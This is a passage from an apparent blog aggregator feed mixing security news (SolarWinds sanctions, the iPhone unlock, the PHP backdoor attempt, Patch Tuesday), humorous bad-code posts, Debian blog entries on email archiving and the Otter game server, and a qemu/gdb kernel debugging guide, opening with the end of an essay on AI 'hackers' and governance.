We need to build resilient governing structures that can quickly and effectively respond to the hacks. It won’t do any good if it takes years to update the tax code, or if a legislative hack becomes so entrenched that it can’t be patched for political reasons. This is a hard problem of modern governance. It also isn’t a substantially different problem than building governing structures that can operate at the speed and complexity of the information age.

What I’ve been describing is the interplay between human and computer systems, and the risks inherent when the computers start doing the part of humans. This, too, is a more general problem than AI hackers. It’s also one that technologists and futurists are writing about. And while it’s easy to let technology lead us into the future, we’re much better off if we as a society decide what technology’s role in our future should be.

This is all something we need to figure out now, before these AIs come online and start hacking our world.

This essay previously appeared on

Worse Than FailureCodeSOD: Universal Problems

Universally Unique Identifiers are a very practical solution to unique IDs. With 10^30 possible values, the odds of having a collision are, well, astronomical. They're fast enough to generate, random enough to be unique, and there are so many of them that- well, they may not be universally unique through all time, but they're certainly unique enough.


Krysk's predecessor isn't so confident.

key = uuid4() if(key in self.unloadQueue): # it probably couldn't possibly collide twice right? # right guys? :D key = uuid4() self.unloadQueue[key] = unloaded

The comments explain the code, but leave me with so many more questions. Did they actually have a collision in the past? Exactly how many entries are they putting in this unloadQueue? The plausible explanation is that the developer responsible was being overly cautious. But… were they?

Krysk writes: "Some code in our production server software. Comments like these are the stuff of nightmares for maintenance programmers."

I don't know about nightmares, but I might lose some sleep puzzling over this.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!


Cryptogram Biden Administration Imposes Sanctions on Russia for SolarWinds

On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks.

I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations. To me, it feels like too little. The New York Times reports that “the sanctions will be among what President Biden’s aides say are ‘seen and unseen steps in response to the hacking,” which implies that there’s more we don’t know about. Also, that “the new measures are intended to have a noticeable effect on the Russian economy.” Honestly, I don’t know what the US should do. Anything that feels more proportional is also more escalatory. I’m sure that dilemma is part of the Russian calculus in all this.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 03)

This week on my podcast, part three of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianRitesh Raj Sarraf: Catching Up Your Sources

I’ve mostly had the preference of controlling my data rather than depend on someone else. That’s one reason why I still believe email to be my most reliable medium for data storage, one that is not plagued/locked by a single entity. If I had the resources, I’d prefer all digital data to be broken down to its simplest form for storage, like email format, and empower the user with it i.e. their data.

Yes, there are free services that are indirectly forced upon common users, and many of us get attracted to it. Many of us do not think that the information, which is shared for the free service in return, is of much importance. Which may be fair, depending on the individual, given that they get certain services without paying any direct dime.

New age communication

So first, we had email and usenet. As I mentioned above, email was designed with fine intentions. Intentions that make it stand even today, independently.

But not everything, back then, was that great either. For example, instant messaging was very closed and centralised then too. Things like: ICQ, MSN, Yahoo Messenger; all were centralized. I wonder if people still have access to their ICQ logs.

Not much has chagned in the current day either. We now have domination by: Facebook Messenger, Google Whatever the new marketing term they introdcue, WhatsApp, Telegram, Signal etc. To my knowledge, they are all centralized.

Over all this time, I’m yet to see a product come up with good (business) intentions, to really empower the end user. In this information age, the most invaluable data is user activity. That’s one data everyone is after. If you decline to share that bit of free data in exchange for the free services, mind you, that that free service like Facebook, Google, Instagram, WhatsApp, Truecaller, Twitter; none of it would come to you at all. Try it out.

So the reality is that while you may not be valuating the data you offer in exchange correctly, there’s a lot that is reaped from it. But still, I think each user has (and should have) the freedom to opt in for these tech giants and give them their personal bit, for free services in return. That is a decent barter deal. And it is a choice that one if free to choose

Retaining my data

I’m fond of keeping an archive folder in my mailbox. A folder that holds significant events in the form of an email usually, if documented. Over the years, I chose to resort to the email format because I felt it was more reliable in the longer term than any other formats.

The next best would be plain text.

In my lifetime, I have learnt a lot from the internet; so it is natural that my preference has been with it. Mailing Lists, IRCs, HOWTOs, Guides, Blog posts; all have helped. And over the years, I’ve come across hundreds of such content that I’d always like to preserve.

Now there are multiple ways to preserving data. Like, for example, big tech giants. In most usual cases, your data for your lifetime, should be fine with a tech giant. In some odd scenarios, you may be unlucky if you relied on a service provider that went bankrupt. But seriously, I think users should be fine if they host their data with Microsoft, Google etc; as long as they abide by their policies.

There’s also the catch of alignment. As the user, you should ensure to align (and transition) with the product offerings of your service provider. Otherwise, what may look constant and always reliable, will vanish in the blink of an eye. I guess Google Plus would be a good example. There was some Google Feed service too. Maybe Google Photos in the near decade future, just like Google Picasa in the previous (or current) decade.

History what is

On the topic of retaining information, lets take a small drift. I still admire our ancestors. I don’t know what went in their mind when they were documenting events in the form of scriptures, carvings, temples, churches, mosques etc; but one things for sure, they were able to leave a fine means of communication. They are all gone but a large number of those events are evident through the creations that they left. Some of those events have been strong enough that further rulers/invaders have had tough times trying to wipe it out from history. Remember, history is usually not the truth, but the statement to be believed by the teller. And the teller is usually the survivor, or the winner you may call.

But still, the information retention techniques were better.

I haven’t visited, but admire whosoever built the Kailasa Temple, Ellora, without which, we’d be made to believe what not by all invaders and rulers of the region. But the majestic standing of the temple, is a fine example of the history and the events that have occured in the past.

Dominance has the power to rewrite history and unfortunately that’s true and it has done its part. It is just that in a mere human’s defined lifetime, it is not possible to witness the transtion from current to history, and say that I was there then and I’m here now, and this is not the reality.

And if not dominance, there’s always the other bit, hearsay. With it, you can always put anything up for dispute. Because there’s no way one can go back in time and produce a fine evidence.

There’s also a part about religion. Religion can be highly sentimental. And religion can be a solid way to get an agenda going. For example, in India - a country which today consitutionally is a secular country, there have been multiple attempts to discard the belief, that never ever did the thing called Ramayana exist. That the Rama Setu, nicely reworded as Adam’s Bridge by who so ever, is a mere result of science. Now Rama, or Hanumana, or Ravana, or Valmiki, aren’t going to come over and prove that that is true or false. So such subjects serve as a solid base to get an agenda going. And probably we’ve even succeeded in proving and believing that there was never an event like Ramayana or the Mahabharata. Nor was there ever any empire other than the Moghul or the British Empire.

But yes, whosoever made the Ellora Temple or the many many more of such creations, did a fine job of making a dent for the future, to know of what the history possibly could also be.

Enough of the drift

So, in my opinion, having events documented is important. It’d be nice to have skills documented too so that it can be passed over generations but that’s a debatable topic. But events, I believe should be documented. And documented in the best possible ways so that its existence is not diminished.

A documentation in the form of certain carvings on a rock is far more better than links and posts shared on Facebook, Twitter, Reddit etc. For one, these are all corporate entities with vested interests and can pretext excuse in the name of compliance and conformance.

So, for the helpless state and generation I am in, I felt email was the best possible independent form of data retention in today’s age. If I really had the resources, I’d not rely on digital age. This age has no guarantee of retaining and recording information in any reliable manner. Instead, it is just mostly junk, which is manipulative and changeable, conditionally.

Email and RSS

So for my communication, I like to prefer emails over any other means. That doesn’t mean I don’t use the current trends. I do. But this blog is mostly about penning my desires. And desire be to have communication over email format.

Such is the case that for information useful over the internet, I crave to have it formatted in email for archival.

RSS feeds is my most common mode of keeping track of information I care about. Not all that I care for is available in RSS feeds but hey such is life. And adaptability is okay.

But my preference is still RSS.

So I use RSS feeds through a fine software called feed2imap. A software that fits my bill fairly well.

feed2imap is:

  • An rss feed news aggregator
  • Pulls and extracts news feeds in the form of an email
  • Can push the converted email over pop/imap
  • Can convert all image content to email mime attachment

In a gist, it makes the online content available to me offline in the most admired email format

In my mail box, in today’s day, my preferred email client is Evolution. It does a good job of dealing with such emails (rss feed items). An image example of accessing the rrs feed item through it is below

The good part is that my actual data is always independent of such MUAs. Tomorrow, as technology - trends - economics evolve, something new would come as a replacement but my data would still be mine.

Trends have shown. Data mobility is a commodity expectation now. As such, I wanted to have something fill in that gap for me. So that I could access my information - which I’ve preferred in a format - easily in today’s trendy options.

I tried multiple options on my current preferred platform of choice for mobiles, i.e. Android. Finally I came across Aqua Mail, which fits in most of my requirements.

Aqua Mail does

  • Connect to my laptop over imap
  • Can sync the requested folders
  • Can sync requested data for offlince accessibility
  • Can present the synchronized data in a quite flexible and customizable manner, to match my taste
  • Has a very extensible User Interface, allowing me to customize it to my taste

Pictures can do a better job of describing my english words.

All of this done with no dependence on network connectivity, post the sync. And all information is stored is best possible simple format.

Worse Than FailureCodeSOD: Maximum Max

Imagine you were browsing a C++ codebase and found a signature in a header file like this:

int max (int a, int b, int c, int d);

Now, what do you think this function does? Would your theories change if I told you that this was just dropped in the header for an otherwise unrelated class file that doesn't actually use the max function?

Let's look at the implementation, supplied by Mariette.

int max (int a, int b, int c, int d) { if (c == d) { // Do nothing.. } if (a >= b) { return a; } else { return b; } }

Now, I have a bit of a reputation of being a ternary hater, but I hate bad ternaries. Every time I write a max function, I write it with a ternary. In that case, it's way more readable, and so while I shouldn't fault the closing if statement in this function, it annoys me. But it's not the WTF anyway.

This max function takes four parameters, but only actually uses two of them. The //Do nothing.. comment is in the code, and that first if statement is there specifically because if it weren't, the compiler would throw warnings about unused parameters.

Those warnings are there for a reason. I suspect someone saw the warning, and contemplated fixing the function, but after seeing the wall of compiler errors generated by changing the function signature, chose this instead. Or maybe they even went so far as to change the behavior, to make it find the max of all four, only to discover that tests failed because there were methods which depended on it only checking the first two parameters.

I'm joking. I assume there weren't any tests. But it did probably crash when someone changed the behavior. Fortunately, no one had used the method expecting it to use all four parameters. Yet.

Mariette confirmed that attempts to fix the function broke many things in the application, so she did the only thing she could do: moved the function into the appropriate implementation files and surrounded it with comments describing its unusual behavior.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet DebianIan Jackson: Otter - a game server for arbitrary board games

One of the things that I found most vexing about lockdown was that I was unable to play some of my favourite board games. There are online systems for many games, but not all. And online systems cannot support games like Mao where the players make up the rules as we go along.

I had an idea for how to solve this problem, and set about implementing it. The result is Otter (the Online Table Top Environment Renderer).

We have played a number of fun games of Penultima with it, and have recently branched out into Mao. The Otter is now ready to be released!

More about Otter

(cribbed shamelessly from the README)

Otter, the Online Table Top Environment Renderer, is an online game system.

But it is not like most online game systems. It does not know (nor does it need to know) the rules of the game you are playing. Instead, it lets you and your friends play with common tabletop/boardgame elements such as hands of cards, boards, and so on.

So it’s something like a “tabletop simulator” (but it does not have any 3D, or a physics engine, or anything like that).

This means that with Otter:

  • Supporting a new game, that Otter doesn’t know about yet, would usually not involve writing or modifying any computer programs.

  • If Otter already has the necessary game elements (cards, say) all you need to do is write a spec file saying what should be on the table at the start of the game. For example, most Whist variants that start with a standard pack of 52 cards are already playable.

  • You can play games where the rules change as the game goes along, or are made up by the players, or are too complicated to write as a computer program.

  • House rules are no problem, since the computer isn’t enforcing the rules - you and your friends are.

  • Everyone can interact with different items on the game table, at any time. (Otter doesn’t know about your game’s turn-taking, so doesn’t know whose turn it might be.)

Installation and usage

Otter is fully functional, but the installation and account management arrangements are rather unsophisticated and un-webby. And there is not currently any publicly available instance you can use to try it out.

Users on chiark will find an instance there.

Other people who who are interested in hosting games (of Penultima or Mao, or other games we might support) will have to find a Unix host or VM to install Otter on, and will probably want help from a Unix sysadmin.

Otter is distributed via git, and is available on Salsa, Debian's gitlab instance.

There is documentation online.

Future plans

I have a number of ideas for improvement, which go off in many different directions.

Quite high up on my priority list is making it possible for players to upload and share game materials (cards, boards, pieces, and so on), rather than just using the ones which are bundled with Otter itself (or dumping files ad-hoc on the server). This will make it much easier to play new games. One big reason I wrote Otter is that I wanted to liberate boardgame players from the need to implemet their game rules as computer code.

The game management and account management is currently done with a command line tool. It would be lovely to improve that, but making a fully-featured management web ui would be a lot of work.


(Click for the full size images.)

comment count unavailable comments


Cryptogram Details on the Unlocking of the San Bernardino Terrorist’s iPhone

The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security.

Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person.


Using the flaw Dowd found, Wang, based in Portland, Ore., created an exploit that enabled initial access to the phone ­ a foot in the door. Then he hitched it to another exploit that permitted greater maneuverability, according to the people. And then he linked that to a final exploit that another Azimuth researcher had already created for iPhones, giving him full control over the phone’s core processor ­ the brains of the device. From there, he wrote software that rapidly tried all combinations of the passcode, bypassing other features, such as the one that erased data after 10 incorrect tries.

Apple is suing various companies over this sort of thing. The article goes into the details.

Krebs on SecurityDid Someone at the Commerce Dept. Find a SolarWinds Backdoor in Aug. 2020?

On Aug. 13, 2020, someone uploaded a suspected malicious file to VirusTotal, a service that scans submitted files against more than five dozen antivirus and security products. Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. An analysis of the malicious file and other submissions by the same VirusTotal user suggest the account that initially flagged the backdoor as suspicious belongs to IT personnel at the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department that handles telecommunications and Internet policy.

Both Microsoft and FireEye published blog posts on Mar. 4 concerning a new backdoor found on high-value targets that were compromised by the SolarWinds attackers. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” FireEye says the Sunshuttle backdoor was named “Lexicon.exe,” and had the unique file signatures or “hashes” of “9466c865f7498a35e4e1a8f48ef1dffd” (MD5) and b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8 (SHA-1).

“In August 2020, a U.S.-based entity uploaded a new backdoor that we have named SUNSHUTTLE to a public malware repository,” FireEye wrote.

The “Sunshuttle” or “GoldMax” backdoor, as identified by FireEye and Microsoft, respectively. Image:

A search in VirusTotal’s malware repository shows that on Aug. 13, 2020 someone uploaded a file with that same name and file hashes. It’s often not hard to look through VirusTotal and find files submitted by specific users over time, and several of those submitted by the same user over nearly two years include messages and files sent to email addresses for people currently working in NTIA’s information technology department.

An apparently internal email that got uploaded to VirusTotal in Feb. 2020 by the same account that uploaded the Sunshuttle backdoor malware to VirusTotal in August 2020.

The NTIA did not respond to requests for comment. But in December 2020, The Wall Street Journal reported the NTIA was among multiple federal agencies that had email and files plundered by the SolarWinds attackers. “The hackers broke into about three dozen email accounts since June at the NTIA, including accounts belonging to the agency’s senior leadership, according to a U.S. official familiar with the matter,” The Journal wrote.

It’s unclear what, if anything, NTIA’s IT staff did in response to scanning the backdoor file back in Aug. 2020. But the world would not find out about the SolarWinds debacle until early December 2020, when FireEye first disclosed the extent of its own compromise from the SolarWinds malware and published details about the tools and techniques used by the perpetrators.

The SolarWinds attack involved malicious code being surreptitiously inserted into updates shipped by SolarWinds for some 18,000 users of its Orion network management software. Beginning in March 2020, the attackers then used the access afforded by the compromised SolarWinds software to push additional backdoors and tools to targets when they wanted deeper access to email and network communications.

U.S. intelligence agencies have attributed the SolarWinds hack to an arm of the Russian state intelligence known as the SVR, which also was determined to have been involved in the hacking of the Democratic National Committee six years ago. On Thursday, the White House issued long-expected sanctions against Russia in response to the SolarWinds attack and other malicious cyber activity, leveling economic sanctions against 32 entities and individuals for disinformation efforts and for carrying out the Russian government’s interference in the 2020 presidential election.

The U.S. Treasury Department (which also was hit with second-stage malware that let the SolarWinds attackers read Treasury email communications) has posted a full list of those targeted, including six Russian companies for providing support to the cyber activities of the Russian intelligence service.

Also on Thursday, the FBI, National Security Agency (NSA), and the Cybersecurity Infrastructure Security Administration (CISA) issued a joint advisory on several vulnerabilities in widely-used software products that the same Russian intelligence units have been attacking to further their exploits in the SolarWinds hack. Among those is CVE-2020-4006, a security hole in VMWare Workspace One Access that VMware patched in December 2020 after hearing about it from the NSA.

On December 18, VMWare saw its stock price dip 5.5 percent after KrebsOnSecurity published a report linking the flaw to NSA reports about the Russian cyberspies behind the SolarWinds attack. At the time, VMWare was saying it had received “no notification or indication that CVE-2020-4006 was used in conjunction with the SolarWinds supply chain compromise.” As a result, a number of readers responded that making this connection was tenuous, circumstantial and speculative.

But the joint advisory makes clear the VMWare flaw was in fact used by SolarWinds attackers to further their exploits.

“Recent Russian SVR activities include compromising SolarWinds Orion software updates, targeting COVID-19 research facilities through deploying WellMess malware, and leveraging a VMware vulnerability that was a zero-day at the time for follow-on Security Assertion Markup Language (SAML) authentication abuse,” the NSA’s advisory (PDF) reads. “SVR cyber actors also used authentication abuse tactics following SolarWinds-based breaches.”

Officials within the Biden administration have told media outlets that a portion of the United States’ response to the SolarWinds hack would not be discussed publicly. But some security experts are concerned that Russian intelligence officials may still have access to networks that ran the backdoored SolarWinds software, and that the Russians could use that access to affect a destructive or disruptive network response of their own, The New York Times reports.

“Inside American intelligence agencies, there have been warnings that the SolarWinds attack — which enabled the SVR to place ‘back doors’ in the computer networks — could give Russia a pathway for malicious activity against government agencies and corporations,” The Times observed.

Worse Than FailureError'd: Days of Future Passed

After reading through so many of your submissions these last few weeks, I'm beginning to notice certain patterns emerging. One of these patterns is that despite the fact that dates are literally as old as time, people seem pathologically prone to bungling them. Surely our readers are already familiar with the notable "Falsehoods Programmers Believe" series of blog posts, but if you happen somehow to have been living under an Internet rock (or a cabbage leaf) for the last few decades, you might start your time travails at Infinite Undo. The examples here are not the most egregious ever (there are better coming later or sooner) but they are today's:

Famished Dug S. peckishly pronounces "It's about time!"


Far luckier Zachary Palmer appears to have found the perfect solution to poor Dug's delayed dinner: "It took the shipping company a little bit to start moving my package, but they made up for it by shipping it faster than the speed of light," says he.


Patient Philip awaits his {ship,prince,processor}: " B&H hitting us with hard truth on when the new line of AMD CPUs will really be available."


While an apparent contemporary of the latest royal Eric R. creakily complains " This website for tracking my continuing education hours should be smart enough not to let me enter a date in the year 21 AD"


But as for His Lateness Himself, royal servant Steve A. has uncovered a scoop fit for Q:


[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Cryptogram NSA Discloses Vulnerabilities in Microsoft Exchange

Amongst the 100+ vulnerabilities patch in this month’s Patch Tuesday, there are four in Microsoft Exchange that were disclosed by the NSA.


Worse Than FailureCodeSOD: Constantly Counting

Steven was working on a temp contract for a government contractor, developing extensions to an ERP system. That ERP system was developed by whatever warm bodies happened to be handy, which meant the last "tech lead" was a junior developer who had no supervision, and before that it was a temp who was only budgeted to spend 2 hours a week on that project.

This meant that it was a great deal of spaghetti code, mashed together with a lot of special-case logic, and attempts to have some sort of organization even if that organization made no sense. Which is why, for example, all of the global constants for the application were required to be in a class Constants.

Of course, when you put a big pile of otherwise unrelated things in one place, you get some surprising results. Like this:

foreach (PurchaseOrder po in poList) { if (String.IsNullOrEmpty(po.PoNumber)) { Constants.NEW_COUNT++; CreatePoInOtherSystem(po); } }

Yes, every time this system passes a purchase order off to another system for processing, the "constant" NEW_COUNT gets incremented. And no, this wasn't the only variable "constant", because before long, the Constants class became the "pile of static variables" class.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Cryptogram DNI’s Annual Threat Assessment

The office of the Director of National Intelligence released its “Annual Threat Assessment of the U.S. Intelligence Community.” Cybersecurity is covered on pages 20-21. Nothing surprising:

  • Cyber threats from nation states and their surrogates will remain acute.
  • States’ increasing use of cyber operations as a tool of national power, including increasing use by militaries around the world, raises the prospect of more destructive and disruptive cyber activity.
  • Authoritarian and illiberal regimes around the world will increasingly exploit digital tools to surveil their citizens, control free expression, and censor and manipulate information to maintain control over their populations.
  • During the last decade, state sponsored hackers have compromised software and IT service supply chains, helping them conduct operations — espionage, sabotage, and potentially prepositioning for warfighting.

The supply chain line is new; I hope the government is paying attention.


Cryptogram The FBI Is Now Securing Networks Without Their Owners’ Permission

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One of the characteristics of the campaign, in the later days when the Chinese probably realized that the vulnerabilities would soon be fixed, was to install a web shell in compromised networks that would give them subsequent remote access. Even if the vulnerabilities were patched, the shell would remain until the network operators removed it.

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it successfully received a court order to remove “hundreds” of these web shells from networks in the US.

This is nothing short of extraordinary, and I can think of no real-world parallel. It’s kind of like if a criminal organization infiltrated a door-lock company and surreptitiously added a master passkey feature, and then customers bought and installed those locks. And then if the FBI got a court order to fix all the locks to remove the master passkey capability. And it’s kind of not like that. In any case, it’s not what we normally think of when we think of a warrant. The links above have details, but I would like a legal scholar to weigh in on the implications of this.

MEBasics of Linux Kernel Debugging

Firstly a disclaimer, I’m not an expert on this and I’m not trying to instruct anyone who is aiming to become an expert. The aim of this blog post is to help someone who has a single kernel issue they want to debug as part of doing something that’s mostly not kernel coding. I welcome comments about the second step to kernel debugging for the benefit of people who need more than this (which might include me next week). Also suggestions for people who can’t use a kvm/qemu debugger would be good.

Below is a command to run qemu with GDB. It should be run from the Linux kernel source directory. You can add other qemu options for a blog device and virtual networking if necessary, but the bug I encountered gave an oops from the initrd so I didn’t need to go further. The “nokaslr” is to avoid address space randomisation which deliberately makes debugging tasks harder (from a certain perspective debugging a kernel and compromising a kernel are fairly similar). Loading the bzImage is fine, gdb can map that to the different file it looks at later on.

qemu-system-x86_64 -kernel arch/x86/boot/bzImage -initrd ../initrd-$KERN_VER -curses -m 2000 -append "root=/dev/vda ro nokaslr" -gdb tcp::1200

The command to run GDB is “gdb vmlinux“, when at the GDB prompt you can run the command “target remote localhost:1200” to connect to the GDB server port 1200. Note that there is nothing special about port 1200, it was given in an example I saw and is as good as any other port. It is important that you run GDB against the “vmlinux” file in the main directory not any of the several stripped and packaged files, GDB can’t handle a bzImage file but that’s OK, it ends up much the same in RAM.

When the “target remote” command is processed the kernel will be suspended by the debugger, if you are looking for a bug early in the boot you may need to be quick about this. Using “qemu-system-x86_64” instead of “kvm” slows things down and can help in that regard. The bug I was hunting happened 1.6 seconds after kernel load with KVM and 7.8 seconds after kernel load with qemu. I am not aware of all the implications of the kvm vs qemu decision on debugging. If your bug is a race condition then trying both would be a good strategy.

After the “target remote” command you can debug the kernel just like any other program.

If you put a breakpoint on print_modules() that will catch the operation of printing an Oops which can be handy.

Worse Than FailureCodeSOD: The Truth and the Truth

When Andy inherited some C# code from a contracting firm, he gave it a quick skim. He saw a bunch of methods with names like IsAvailable or CanPerform…, but he also saw that it was essentially random as to whether or not these methods returned bool or string.

That didn't seem like a good thing, so he started to take a deeper look, and that's when he found this.

public ActionResult EditGroup(Group group) { string fleetSuccess = string.Empty; bool success = false; if(action != null) { fleetSuccess = updateGroup(group); } else { fleetSuccess = Boolean.TrueString; } success = updateExternalGroup(group); fleetSuccess += "&&&" + success; if (fleetSuccess.ToLower().Equals("true&&&true")) { GetActivityDataFromService(group, false); } return Json(fleetSuccess, JsonRequestBehavior.AllowGet); }

So, updateGroup returns a string containing a boolean (at least, we hope it contains a boolean). updateExternalGroup returns an actual boolean. If both of these things are true, than we want to invoke GetActivityDataFromService.

Clearly, the only way to do this comparison is to force everything into being a string, with a &&& jammed in the middle as a spacer. Uh, for readability, I guess? Maybe? I almost suspect someone thought they were inventing their own "and" operator and didn't want it to conflict with & or &&.

Or maybe, maybe their code was read aloud by Jeff Goldblum. "True, and-and-and true!" It's very clear they didn't think about whether or not they should do this.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Cryptogram More Biden Cybersecurity Nominations


President Biden announced key cybersecurity leadership nominations Monday, proposing Jen Easterly as the next head of the Cybersecurity and Infrastructure Security Agency and John “Chris” Inglis as the first ever national cyber director (NCD).

I know them both, and think they’re both good choices.

More news.

Cryptogram Backdoor Added — But Found — in PHP

Unknown hackers attempted to add a backdoor to the PHP source code. It was two malicious commits, with the subject “fix typo” and the names of known PHP developers and maintainers. They were discovered and removed before being pushed out to any users. But since 79% of the Internet’s websites use PHP, it’s scary.

Developers have moved PHP to GitHub, which has better authentication. Hopefully it will be enough — PHP is a juicy target.

Krebs on SecurityMicrosoft Patch Tuesday, April 2021 Edition

Microsoft today released updates to plug at least 110 security holes in its Windows operating systems and other products. The patches include four security fixes for Microsoft Exchange Server — the same systems that have been besieged by attacks on four separate (and zero-day) bugs in the email software over the past month. Redmond also patched a Windows flaw that is actively being exploited in the wild.

Nineteen of the vulnerabilities fixed this month earned Microsoft’s most-dire “Critical” label, meaning they could be used by malware or malcontents to seize remote control over vulnerable Windows systems without any help from users.

Microsoft released updates to fix four more flaws in Exchange Server versions 2013-2019 (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483). Interestingly, all four were reported by the U.S. National Security Agency, although Microsoft says it also found two of the bugs internally. A Microsoft blog post published along with today’s patches urges Exchange Server users to make patching their systems a top priority.

Satnam Narang, staff research engineer at Tenable, said these vulnerabilities have been rated ‘Exploitation More Likely’ using Microsoft’s Exploitability Index.

“Two of the four vulnerabilities (CVE-2021-28480, CVE-2021-28481) are pre-authentication, meaning an attacker does not need to authenticate to the vulnerable Exchange server to exploit the flaw,” Narang said. “With the intense interest in Exchange Server since last month, it is crucial that organizations apply these Exchange Server patches immediately.”

Also patched today was a vulnerability in Windows (CVE-2021-28310) that’s being exploited in active attacks already. The flaw allows an attacker to elevate their privileges on a target system.

“This does mean that they will either need to log on to a system or trick a legitimate user into running the code on their behalf,” said Dustin Childs of Trend Micro. “Considering who is listed as discovering this bug, it is probably being used in malware. Bugs of this nature are typically combined with other bugs, such as browser bug of PDF exploit, to take over a system.”

In a technical writeup on what they’ve observed since finding and reporting attacks on CVE-2021-28310, researchers at Kaspersky Lab noted the exploit they saw was likely used together with other browser exploits to escape “sandbox” protections of the browser.

“Unfortunately, we weren’t able to capture a full chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities,” Kaspersky’s researchers wrote.

Allan Laska, senior security architect at Recorded Future, notes that there are several remote code execution vulnerabilities in Microsoft Office products released this month as well. CVE-2021-28454 and CVE-2021-28451 involve Excel, while CVE-2021-28453 is in Microsoft Word and CVE-2021-28449 is in Microsoft Office. All four vulnerabilities are labeled by Microsoft as “Important” (not quite as bad as “Critical”). These vulnerabilities impact all versions of their respective products, including Office 365.

Other Microsoft products that got security updates this month include Edge (Chromium-based), Azure and Azure DevOps Server, SharePoint Server, Hyper-V, Team Foundation Server, and Visual Studio.

Separately, Adobe has released security updates for Photoshop, Digital Editions, RoboHelp, and Bridge.

It’s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it’s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.

But before you update, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

LongNowTouching the Future

Aboriginal fish traps.

In search of a new story for the future of artificial intelligence, Long Now speaker Genevieve Bell looks back to its cybernetic origins — and keeps on looking, thousands of years into the past.

From her new essay in Griffith Review:

In this moment, we need to be reminded that stories of the future – about AI, or any kind – are never just about technology; they are about people and they are about the places those people find themselves, the places they might call home and the systems that bind them all together.

Genevieve Bell, “Touching the Future” in Griffith Review.

Cryptogram Cybersecurity Experts to Follow on Twitter

Security Boulevard recently listed the “Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021.” I came in at #7. I thought that was pretty good, especially since I never tweet. My Twitter feed just mirrors my blog. (If you are one of the 134K people who read me from Twitter, “hi.”)

Worse Than FailureCodeSOD: A Form of Reuse

Writing code that is reusable is an important part of software development. In a way, we're not simply solving the problem at hand, but we're building tools we can use to solve similar problems in the future. Now, that's also a risk: premature abstraction is its own source of WTFs.

Daniel's peer wrote some JavaScript which is used for manipulating form inputs on customer contact forms. You know the sorts of forms: give us your full name, phone number, company name, email, and someone from our team will be in touch. This developer wrote the script, and offered it to clients to enhance their forms. Well, there was one problem: this script would get embedded in customer contact forms, but not all customer contact forms use the same conventions for how they name their fields.

There's an easy solution for that, involving parameterizing the code or adding a configuration step. There's a hard solution, where you build a heuristic that works for most forms. Then there's this solution, which… well…. Let me present the logic for handling just one field type, unredacted or elided.

for(llelementlooper=0; llelementlooper<document.forms[llformlooper2].elements.length; llelementlooper++) { var llelementphone = (document.forms[llformlooper2].elements[llelementlooper].name) if ( llformphone == '' && ((llelementphone=='phone') || (llelementphone=='Phone') || (llelementphone=='phone') || (llelementphone=='mobilephone') || (llelementphone=='PHONE') || (llelementphone=='sPhone') || (llelementphone=='strPhone') || (llelementphone=='Telephone') || (llelementphone=='telephone') || (llelementphone=='tel') || (llelementphone=='si_contact_ex_field6') || (llelementphone=='phonenumber') || (llelementphone=='phone_number') || (llelementphone=='phoneTextBox') || (llelementphone=='PhoneNumber_num_25_1') || (llelementphone=='Telefone') || (llelementphone=='Contact Phone') || (llelementphone=='submitted[row_3][phone]') || (llelementphone=='edit-profile-phone') || (llelementphone=='contactTelephone') || (llelementphone=='f4') || (llelementphone=='Contact-Phone') || (llelementphone=='formItem_239') || (llelementphone=='phone_r') || (llelementphone=='PhoneNo') || (llelementphone=='LeadGen_ContactForm_98494_m0:Phone') || (llelementphone=='telefono') || (llelementphone=='ntelephone') || (llelementphone=='wtelephone') || (llelementphone=='watelephone') || (llelementphone=='form[telefoon]') || (llelementphone=='phone_work') || (llelementphone=='telephone-number') || (llelementphone=='ctl00$HeaderText$ctl00$PhoneText') || (llelementphone=='ctl00$ctl00$cphMain$cphInsideMain$widget1$ctl00$viewBiz$ctl00$phone$textbox') || (llelementphone=='ctl00$ctl00$ContentPlaceHolderBase$ContentPlaceHolderSideMenu$TextBoxPhone') || (llelementphone=='ctl00$SPWebPartManager1$g_c8bd31c3_e338_41df_bdbe_021242ca01c8$ctl01$ctl06$txtTextbox') || 